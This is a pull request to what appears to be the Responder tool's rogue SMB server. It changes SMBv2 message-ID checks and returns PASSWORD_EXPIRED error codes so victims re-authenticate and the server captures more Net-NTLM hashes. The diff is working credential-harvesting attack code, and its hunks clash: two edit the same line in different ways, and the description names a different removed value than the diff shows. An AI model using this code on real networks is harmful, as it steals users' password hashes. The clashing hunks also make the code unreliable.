### PR TITLE
fixed bug in SMBv2 server

### DIFF
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -236,7 +236,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
               				self.request.send(buffer1)
               				data = self.request.recv(1024)
                                 ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x03" and data[4:5] == "\xfe":
+				if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
               				ParseSMBHash(data, self.client_address[0], Challenge)
               				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
               				t = SMB2Session2Data()

--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -277,7 +277,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 
 					if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # STATUS_SUCCESS
 						if Is_Anonymous(data):
-							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+							Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x71\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x71\x00\x00\xc0" password expired for anonymous logins.
 							Body = SMBSessEmpty()
 
 							Packet = str(Header)+str(Body)
@@ -290,8 +290,8 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 							ParseSMBHash(data,self.client_address[0], Challenge)
 
 							if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
-								# Send ACCOUNT_DISABLED to get multiple hashes if there are any
-								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
+								# Send PASSWORD_EXPIRED to get multiple hashes if there are any
+								Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x71\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x71\x00\x00\xc0" password expired for anonymous logins.
 								Body = SMBSessEmpty()
 
 								Packet = str(Header)+str(Body)

--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -236,7 +236,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
               				self.request.send(buffer1)
               				data = self.request.recv(1024)
                                 ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
+				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x03" and data[4:5] == "\xfe":
               				ParseSMBHash(data, self.client_address[0], Challenge)
               				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
               				t = SMB2Session2Data()


### PR DESCRIPTION
When using Responder SMBv2 server,  the first time client authenticate The Responder SMBv2 server ,the Message ID of the packet with Net-NTML hash is 3(Responder capture the first Net-NTLM hashes).then the Responder SMBv2 server will send client the ACCESS-DENIED message to make client to try the second time ,thus the server can capture the a new Net-NTLM hash,In this time ,the Message ID of the packet with Net-NTML hash is 2. so delete  '   and GrabMessageID(data)[0:1] == "\x02"  ' to make sure Responder can capture Net-NTLM hashes twice.(make Responder SMBv2 server works better )